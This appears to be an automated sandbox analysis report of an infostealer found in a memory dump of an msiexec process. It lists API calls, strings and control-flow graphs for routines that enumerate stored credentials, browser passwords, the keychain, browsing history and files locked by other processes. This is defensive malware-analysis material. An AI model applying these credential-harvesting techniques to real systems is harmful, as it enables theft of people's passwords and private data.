                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                      • API String ID: 2263259095-3798722523
                                                                                                      • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                      • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                                                      • API String ID: 2744995895-28296030
                                                                                                      • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                      • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040B71C
                                                                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                                                                      • memset.MSVCRT ref: 0040B756
                                                                                                      • memset.MSVCRT ref: 0040B7F5
                                                                                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                      • memset.MSVCRT ref: 0040B851
                                                                                                      • memset.MSVCRT ref: 0040B8CA
                                                                                                      • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                      • memset.MSVCRT ref: 0040BB53
                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                      • String ID: chp$v10
                                                                                                      • API String ID: 4290143792-2783969131
                                                                                                      • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                      • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 512 40e304-40e316 call 406e8f 511->512 517 40e476-40e483 call 406b53 512->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->512 525->510 530 40e497-40e49f free 525->530 530->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 552 40e3b0 543->552 553 40e3b3-40e3c1 wcschr 543->553 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 550 40e3fb-40e40c memcpy 549->550 551 40e40f-40e414 549->551 550->551 554 40e416-40e427 memcpy 551->554 555 40e42a-40e42f 551->555 552->553 553->542 556 40e3c3-40e3c6 553->556 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                      • free.MSVCRT ref: 0040E49A
                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                      • memset.MSVCRT ref: 0040E380
                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76F92EE0), ref: 0040E3EC
                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76F92EE0), ref: 0040E407
                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76F92EE0), ref: 0040E422
                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,76F92EE0), ref: 0040E43D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                      • API String ID: 3849927982-2252543386
                                                                                                      • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                      • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 587 4093b1 574->587 588 4094ff-40950b call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 587->589 588->568 597 40950d-409511 588->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->588 611->580 613 40929f-4092a3 611->613 613->580 614 4092a9-4092ba 613->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004091E2
                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                      • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                      • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                      • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                      • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                      • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3715365532-3916222277
                                                                                                      • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                      • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                        • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                      • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                      • String ID: bhv
                                                                                                      • API String ID: 4234240956-2689659898
                                                                                                      • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                      • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                      • API String ID: 2941347001-70141382
                                                                                                      • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                      • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 710 4467ac-4467b7 __setusermatherr 703->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->711 705->701 709 44674d-44674f 705->709 706->701 708 446734-44673b 706->708 708->701 712 44673d-446745 708->712 713 446755-446758 709->713 710->711 716 446810-446819 711->716 717 44681e-446825 711->717 712->713 713->703 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 728 446853-446864 GetStartupInfoW 721->728 729 44684d-446851 721->729 722->720 723->719 723->724 724->721 726 446840-446842 724->726 726->721 730 446866-44686a 728->730 731 446879-44687b 728->731 729->726 729->728 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                      • String ID:
                                                                                                      • API String ID: 2827331108-0
                                                                                                      • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                      • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                      • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                      • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C298
                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                      • wcschr.MSVCRT ref: 0040C324
                                                                                                      • wcschr.MSVCRT ref: 0040C344
                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                      • GetLastError.KERNEL32 ref: 0040C373
                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                      • String ID: visited:
                                                                                                      • API String ID: 1157525455-1702587658
                                                                                                      • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                      • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 782 40e283-40e286 775->782 776->775 787 40e21b-40e21d 776->787 783 40e291-40e294 call 40aa04 782->783 784 40e288-40e290 free 782->784 783->769 784->783 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                      • memset.MSVCRT ref: 0040E1BD
                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                      • free.MSVCRT ref: 0040E28B
                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                      • _snwprintf.MSVCRT ref: 0040E257
                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                      • API String ID: 2804212203-2982631422
                                                                                                      • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                      • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                      • memset.MSVCRT ref: 0040BC75
                                                                                                      • memset.MSVCRT ref: 0040BC8C
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                      • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 115830560-3916222277
                                                                                                      • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                      • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
